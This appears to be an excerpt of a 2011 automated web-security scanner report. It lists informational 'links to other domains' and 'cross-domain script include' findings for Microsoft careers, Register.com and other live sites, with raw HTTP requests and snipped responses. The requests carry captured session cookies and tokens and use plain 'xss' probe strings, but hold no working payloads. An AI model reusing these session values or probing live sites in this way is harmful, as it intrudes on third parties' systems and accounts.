Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:26:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 16676
Content-Type: text/html
ACCEPT-RANGES: none

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Microcad.ca | McA
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/base.css" />
       <link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/themes/base/jquery-ui.css" />
       <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Droid+Sans:regular,bold" />
       
...[SNIP]...
<div id="social-media">
                   <a href='http://www.twitter.com/microcadcorp' title='Follow us on Twitter'><img src='/images/twitter.png' alt='Twitter' /></a>
                   <a href='http://www.facebook.com/microcadcorp' title='Follow us on Facebook'><img src='/images/facebook.png' alt='Facebook' />
...[SNIP]...
<div id="image">
               <img src="http://content.etilize.com/images/160/1011956760.jpg?noimage=logo" id="image-normal" alt="McAfee SafeBoot Web Server SSL Certificate with 1 Year Gold Support - 1 User" />
       
<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js"></script>
...[SNIP]...

17.55. http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/

Issue detail

The page was loaded from a URL containing a query string:

http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/?utm_source=J2WRSS&utm_medium=rss&utm_campaign=NERD

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://cdn.socialtwist.com/200901147338/script.js
http://go.microsoft.com/?linkid=4412892
http://go.microsoft.com/?linkid=4412893
http://go.microsoft.com/?linkid=4412894
http://platform.linkedin.com/in.js
http://www.jobs2web.com/
http://www.microsoft.com/about/diversity/default.mspx
https://support.microsoft.com/contactus/emailcontact.aspx?scid=sw;en;1247&ws=careers

Request

GET /job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/?utm_source=J2WRSS&utm_medium=rss&utm_campaign=NERD HTTP/1.1
Host: www.microsoft-careers.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Working/Jobs/tabid/145/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:08:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<
...[SNIP]...
<link href="/sites/microsoft_global/css/job.css" rel="stylesheet" type="text/css" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<div id="social-network-button">


                       <script type="text/javascript" src="http://cdn.socialtwist.com/200901147338/script.js"></script>
...[SNIP]...
<div id="liConnections"><script type="text/javascript" src="http://platform.linkedin.com/in.js">api_key: 2engpjnq_X36tzHVQAh_e_GZL7jlBa9iJ1mUTHp4r5b-4NOIlyyl0ouIKG-xADIZonLoad: onLinkedInLoadauthorize: true</script>
...[SNIP]...
<span class="footer-inner">
            <a href="https://support.microsoft.com/contactus/emailcontact.aspx?scid=sw;en;1247&ws=careers" target="_blank" title="Click to Contact Us">Contact
            Us</a>
            <a href="http://go.microsoft.com/?linkid=4412892" target="_blank" title="Click for the Terms of Use">Terms of Use</a> <a href="http://go.microsoft.com/?linkid=4412893" target="_blank" title="Click for Trademarks">Trademarks</a> <a href="http://go.microsoft.com/?linkid=4412894" target="_blank" title="Click for Privacy Statement">Privacy
            Statement</a>
            <a href="http://www.microsoft.com/about/diversity/default.mspx" target="_blank" title="Microsoft Supports EEO & Diversity">Microsoft Supports EEO & Diversity</a>
...[SNIP]...
</a> |
               <a href="http://www.jobs2web.com/" target="_blank" title="Powered by Jobs2Web">Powered by Jobs2Web</a>
...[SNIP]...

17.56. http://www.microsoft-careers.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.microsoft-careers.com/search?q=xss

The response contains the following links to other domains:

http://add.my.yahoo.com/rss?url=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Ffeeds%2Fxss%2F%3Fsrc%3DRSS
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://cdn.socialtwist.com/200901147338/script.js
http://fusion.google.com/add?feedurl=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Ffeeds%2Fxss%2F%3Fsrc%3DRSS
http://go.microsoft.com/?linkid=4412892
http://go.microsoft.com/?linkid=4412893
http://go.microsoft.com/?linkid=4412894
http://my.msn.com/addtomymsn.armx?id=rss&ut=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Ffeeds%2Fxss%2F%3Fsrc%3DRSS
http://platform.linkedin.com/in.js
http://www.jobs2web.com/
http://www.microsoft.com/about/diversity/default.mspx
https://support.microsoft.com/contactus/emailcontact.aspx?scid=sw;en;1247&ws=careers

Request

GET /search?q=xss HTTP/1.1
Host: www.microsoft-careers.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/?utm_source=J2WRSS&utm_medium=rss&utm_campaign=NERD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=PWZKZXS192.168.50.232CKOUJ; CFID=40795863; CFTOKEN=90534017; JSESSIONID=7c305511ba2da977588c595e786a4e14f156; BROWSERTYPE=standard; PREFERREDBROWSER=standard; COOKIECHECK=10; TCPASSWORD=; EMAIL=; USERID=11; REMEMBERME=; __utma=222260868.1458567656.1315055374.1315055374.1315055374.1; __utmb=222260868.2.10.1315055374; __utmc=222260868; __utmz=222260868.1315055374.1.1.utmcsr=J2WRSS|utmccn=NERD|utmcmd=rss; REFERRERSTRING=http%3A%2F%2Fmicrosoftcambridge%2Ecom%2FWorking%2FJobs%2Ftabid%2F145%2FDefault%2Easpx; LANDINGPAGE=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Fjob%2FCambridge%2DSDE%2D2C%2DSenior%2D763405%2DJob%2DMA%2D02138%2F1388917%2F%3Futm%5Fsource%3DJ2WRSS%26utm%5Fmedium%3Drss%26utm%5Fcampaign%3DNERD

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:09:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<link href="/sites/microsoft_global/css/search.css" rel="stylesheet" type="text/css" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</a>

                               <a class="rsslink-google" lang="en_US" xml:lang="en_US" href="http://fusion.google.com/add?feedurl=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Ffeeds%2Fxss%2F%3Fsrc%3DRSS" title="Add to Google"><img src="/images/shared/feeds/rss-icon-google.gif" width="36" height="17" border="0" alt="Add to Google"/></a>

                               <a class="rsslink-yahoo" lang="en_US" xml:lang="en_US" href="http://add.my.yahoo.com/rss?url=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Ffeeds%2Fxss%2F%3Fsrc%3DRSS" title="Add to Yahoo!"><img src="/images/shared/feeds/rss-icon-yahoo.gif" width="45" height="17" border="0" alt="Add to Yahoo!"/></a>

                               <a class="rsslink-msn" lang="en_US" xml:lang="en_US" href="http://my.msn.com/addtomymsn.armx?id=rss&ut=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Ffeeds%2Fxss%2F%3Fsrc%3DRSS" title="Add to MSN"><img src="/images/shared/feeds/rss-icon-live.gif" width="36" height="17" border="0" alt="Add to MSN" />
...[SNIP]...
<div id="social-network-button">


                       <script type="text/javascript" src="http://cdn.socialtwist.com/200901147338/script.js"></script>
...[SNIP]...
<div id="liConnections"><script type="text/javascript" src="http://platform.linkedin.com/in.js">api_key: 2engpjnq_X36tzHVQAh_e_GZL7jlBa9iJ1mUTHp4r5b-4NOIlyyl0ouIKG-xADIZonLoad: onLinkedInLoadauthorize: true</script>
...[SNIP]...
<span class="footer-inner">
            <a href="https://support.microsoft.com/contactus/emailcontact.aspx?scid=sw;en;1247&ws=careers" target="_blank" title="Click to Contact Us">Contact
            Us</a>
            <a href="http://go.microsoft.com/?linkid=4412892" target="_blank" title="Click for the Terms of Use">Terms of Use</a> <a href="http://go.microsoft.com/?linkid=4412893" target="_blank" title="Click for Trademarks">Trademarks</a> <a href="http://go.microsoft.com/?linkid=4412894" target="_blank" title="Click for Privacy Statement">Privacy
            Statement</a>
            <a href="http://www.microsoft.com/about/diversity/default.mspx" target="_blank" title="Microsoft Supports EEO & Diversity">Microsoft Supports EEO & Diversity</a>
...[SNIP]...
</a> |
               <a href="http://www.jobs2web.com/" target="_blank" title="Powered by Jobs2Web">Powered by Jobs2Web</a>
...[SNIP]...

17.57. https://www.microsoft-careers.com/find.job previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/find.job

Issue detail

The page was loaded from a URL containing a query string:

https://www.microsoft-careers.com/find.job?job=vjobs.jobMap&trackingCode=j2wmap&trackingVariable=utm_source&baseCountry=World&baseState=&mapColorDark=FFD9BC&mapColorLight=26ade7&mapRolloverColor=26ade7&borderColor=666666&borderCornerRadius=10&borderThickness=3&showJ2WLogo=true&showSearchBox=true&bgColorTop=FFFFFF&bgColorBottom=E6E6E6&mapLabelColor=666666&mapBorderColor=CCCCCC&mapBorderThickness=1&mapColorBlankDark=EEEEEE&mapColorBlankLight=BBBBBB&mapLegendLabelColor=666666&mapColorCities=70be46&refurl=https%3A%2F%2Fwww.microsoft-careers.com%2F

The response contains the following link to another domain:

https://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js

Request

GET /find.job?job=vjobs.jobMap&trackingCode=j2wmap&trackingVariable=utm_source&baseCountry=World&baseState=&mapColorDark=FFD9BC&mapColorLight=26ade7&mapRolloverColor=26ade7&borderColor=666666&borderCornerRadius=10&borderThickness=3&showJ2WLogo=true&showSearchBox=true&bgColorTop=FFFFFF&bgColorBottom=E6E6E6&mapLabelColor=666666&mapBorderColor=CCCCCC&mapBorderThickness=1&mapColorBlankDark=EEEEEE&mapColorBlankLight=BBBBBB&mapLegendLabelColor=666666&mapColorCities=70be46&refurl=https%3A%2F%2Fwww.microsoft-careers.com%2F HTTP/1.1
Host: www.microsoft-careers.com
Connection: keep-alive
Referer: https://www.microsoft-careers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=PWZKZXS192.168.50.232CKOUJ; CFID=40795863; CFTOKEN=90534017; JSESSIONID=7c305511ba2da977588c595e786a4e14f156; BROWSERTYPE=standard; PREFERREDBROWSER=standard; COOKIECHECK=10; TCPASSWORD=; EMAIL=; USERID=11; REMEMBERME=; REFERRERSTRING=http%3A%2F%2Fmicrosoftcambridge%2Ecom%2FWorking%2FJobs%2Ftabid%2F145%2FDefault%2Easpx; LANDINGPAGE=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Fjob%2FCambridge%2DSDE%2D2C%2DSenior%2D763405%2DJob%2DMA%2D02138%2F1388917%2F%3Futm%5Fsource%3DJ2WRSS%26utm%5Fmedium%3Drss%26utm%5Fcampaign%3DNERD; __utma=222260868.1458567656.1315055374.1315055374.1315055374.1; __utmb=222260868.4.10.1315055374; __utmc=222260868; __utmz=222260868.1315055374.1.1.utmcsr=J2WRSS|utmccn=NERD|utmcmd=rss

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:10:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>
<script src="https://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...

17.58. https://www.microsoft-careers.com/talentcommunity/subscribe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/talentcommunity/subscribe/

Issue detail

The page was loaded from a URL containing a query string:

https://www.microsoft-careers.com/talentcommunity/subscribe/?email=xss@xss.cx

The response contains the following links to other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
https://platform.linkedin.com/in.js
https://support.microsoft.com/contactus/emailcontact.aspx?scid=sw;en;1247&ws=careers

Request

GET /talentcommunity/subscribe/?email=xss@xss.cx HTTP/1.1
Host: www.microsoft-careers.com
Connection: keep-alive
Referer: http://www.microsoft-careers.com/search?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=PWZKZXS192.168.50.232CKOUJ; CFID=40795863; CFTOKEN=90534017; JSESSIONID=7c305511ba2da977588c595e786a4e14f156; BROWSERTYPE=standard; PREFERREDBROWSER=standard; COOKIECHECK=10; TCPASSWORD=; EMAIL=; USERID=11; REMEMBERME=; REFERRERSTRING=http%3A%2F%2Fmicrosoftcambridge%2Ecom%2FWorking%2FJobs%2Ftabid%2F145%2FDefault%2Easpx; LANDINGPAGE=http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom%2Fjob%2FCambridge%2DSDE%2D2C%2DSenior%2D763405%2DJob%2DMA%2D02138%2F1388917%2F%3Futm%5Fsource%3DJ2WRSS%26utm%5Fmedium%3Drss%26utm%5Fcampaign%3DNERD; __utma=222260868.1458567656.1315055374.1315055374.1315055374.1; __utmb=222260868.4.10.1315055374; __utmc=222260868; __utmz=222260868.1315055374.1.1.utmcsr=J2WRSS|utmccn=NERD|utmcmd=rss

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:09:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
pragma: no-cache
expires: Mon, 06 Jan 1990 00:00:01 GMT
Cache-Control: private
Cache-Control: no-cache, no-store, must-revalidate
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<link href="/sites/microsoft_global/css/custom.css" rel="stylesheet" type="text/css" />

   <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</table>

           <script type="text/javascript" src="https://platform.linkedin.com/in.js">
               api_key: 2engpjnq_X36tzHVQAh_e_GZL7jlBa9iJ1mUTHp4r5b-4NOIlyyl0ouIKG-xADIZ
               onLoad: onLinkedInLoad
               authorize: true
           </script>
...[SNIP]...
<span class="footer-inner">
            <a href="https://support.microsoft.com/contactus/emailcontact.aspx?scid=sw;en;1247&ws=careers" target="_blank" title="Click to Contact Us">Contact
            Us</a>
...[SNIP]...

17.59. http://www.register.com/domain/searchresults.rcmx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/domain/searchresults.rcmx

Issue detail

The page was loaded from a URL containing a query string:

http://www.register.com/domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0

The response contains the following links to other domains:

http://www.afternic.com/domain-name-appraisal-partners.php?rid=2987&utm_source=register&utm_medium=affiliate-referral&utm_campaign=order-appraisal
http://www.afternic.com/rcom.php?ref_id=2987&name=xss.com
http://www.omniture.com/
http://www.rconnection.com/
https://102.122.2o7.net/b/ss/registercom/1/H.20.3--NS/0
https://www.googleadservices.com/pagead/conversion.js
https://www.googleadservices.com/pagead/conversion/974081568/?label=4koMCOi4tgIQoJy90AM&guid=ON&script=0
https://www.googleadservices.com/pagead/conversion/974081568/?label=VFsmCKDisAIQoJy90AM&guid=ON&script=0

Request

GET /domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:39:08 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: JSESSIONID=FC623F2DB25506910A73E866C7ED4DCB.janus-production; Path=/
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: TSfd06f3=9f156b13a4f431e8f00ccda3b691d1c601a75911468e3f0e4e629e11286023f2a5f6f62c948e24c6bb42c46baef45b0f14e6f57f2fa29a6eab649bb360ac0ec52844c82e16f670b9423cfffa60ac0ec52844c82e; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 31307
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<li><a href="http://www.afternic.com/domain-name-appraisal-partners.php?rid=2987&utm_source=register&utm_medium=affiliate-referral&utm_campaign=order-appraisal" target="_blank">Domain Appraisal</a>
...[SNIP]...
</p>
<a href="http://www.afternic.com/rcom.php?ref_id=2987&name=xss.com">Make an Offer Now</a>
...[SNIP]...
</span> <a href="http://www.rconnection.com">Become a Reseller</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="https://102.122.2O7.net/b/ss/registercom/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/974081568/?label=VFsmCKDisAIQoJy90AM&guid=ON&script=0"/>
</div>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/974081568/?label=4koMCOi4tgIQoJy90AM&guid=ON&script=0"/>
</div>
...[SNIP]...

17.60. http://www.register.com/unauthenticated_session_expired.rcmx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/unauthenticated_session_expired.rcmx

Issue detail

The page was loaded from a URL containing a query string:

http://www.register.com/unauthenticated_session_expired.rcmx?opener=/domain/searchresults.rcmx

The response contains the following links to other domains:

http://www.afternic.com/domain-name-appraisal-partners.php?rid=2987&utm_source=register&utm_medium=affiliate-referral&utm_campaign=order-appraisal
http://www.omniture.com/
http://www.rconnection.com/
https://102.122.2o7.net/b/ss/registercom/1/H.20.3--NS/0
https://www.googleadservices.com/pagead/conversion.js
https://www.googleadservices.com/pagead/conversion/974081568/?label=4koMCOi4tgIQoJy90AM&guid=ON&script=0
https://www.googleadservices.com/pagead/conversion/974081568/?label=VFsmCKDisAIQoJy90AM&guid=ON&script=0

Request

GET /unauthenticated_session_expired.rcmx?opener=/domain/searchresults.rcmx HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=session#1315085400638-452340#1315087347|PC#1315085400638-452340.19#1317677487|check#true#1315085547; OAX=Mhd7ak5inIsACxRd; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.2.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 22:11:04 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 23318
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
<li><a href="http://www.afternic.com/domain-name-appraisal-partners.php?rid=2987&utm_source=register&utm_medium=affiliate-referral&utm_campaign=order-appraisal" target="_blank">Domain Appraisal</a>
...[SNIP]...
</span> <a href="http://www.rconnection.com">Become a Reseller</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="https://102.122.2O7.net/b/ss/registercom/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/974081568/?label=VFsmCKDisAIQoJy90AM&guid=ON&script=0"/>
</div>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/974081568/?label=4koMCOi4tgIQoJy90AM&guid=ON&script=0"/>
</div>
...[SNIP]...

17.61. https://www.sslmatrix.com/Order/quickorder previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/Order/quickorder

Issue detail

The page was loaded from a URL containing a query string:

https://www.sslmatrix.com/Order/quickorder?pid=1&yr=5&ot=new&cc=smr09

The response contains the following link to another domain:

https://smarticon.geotrust.com/si.js

Request

Response

18. Cross-domain script include previous next
There are 307 instances of this issue:

http://assets.tumblr.com/iframe.html
https://cart.godaddy.com/basket.aspx
http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
http://geom2.com/
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/retrieveaccount.aspx
http://meetupblog.meetup.com/
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom
http://research.microsoft.com/Search
http://research.microsoft.com/apps/dp/areas.aspx
http://research.microsoft.com/apps/dp/blank.jpg
http://research.microsoft.com/apps/dp/dl/downloads.aspx
http://research.microsoft.com/apps/dp/downloads.aspx
http://research.microsoft.com/apps/dp/ev/events.aspx
http://research.microsoft.com/apps/dp/gr/groups.aspx
http://research.microsoft.com/apps/dp/groups.aspx
http://research.microsoft.com/apps/dp/i/reverse_
http://research.microsoft.com/apps/dp/ne/news.aspx
http://research.microsoft.com/apps/dp/news.aspx
http://research.microsoft.com/apps/dp/pe/people.aspx
http://research.microsoft.com/apps/dp/pr/projects.aspx
http://research.microsoft.com/apps/dp/projects.aspx
http://research.microsoft.com/apps/dp/pu/publications.aspx
http://research.microsoft.com/apps/dp/search.aspx
http://research.microsoft.com/apps/dp/vi/videos.aspx
http://research.microsoft.com/apps/pubs/default.aspx
http://research.microsoft.com/apps/search/videosearch.ashx
http://research.microsoft.com/apps/video/default.aspx
http://research.microsoft.com/en-us/about/awards.aspx
http://research.microsoft.com/en-us/about/brochure-1.aspx
http://research.microsoft.com/en-us/about/brochure-2.aspx
http://research.microsoft.com/en-us/about/brochure-3.aspx
http://research.microsoft.com/en-us/about/brochure-4.aspx
http://research.microsoft.com/en-us/about/brochure-5.aspx
http://research.microsoft.com/en-us/about/brochure-6.aspx
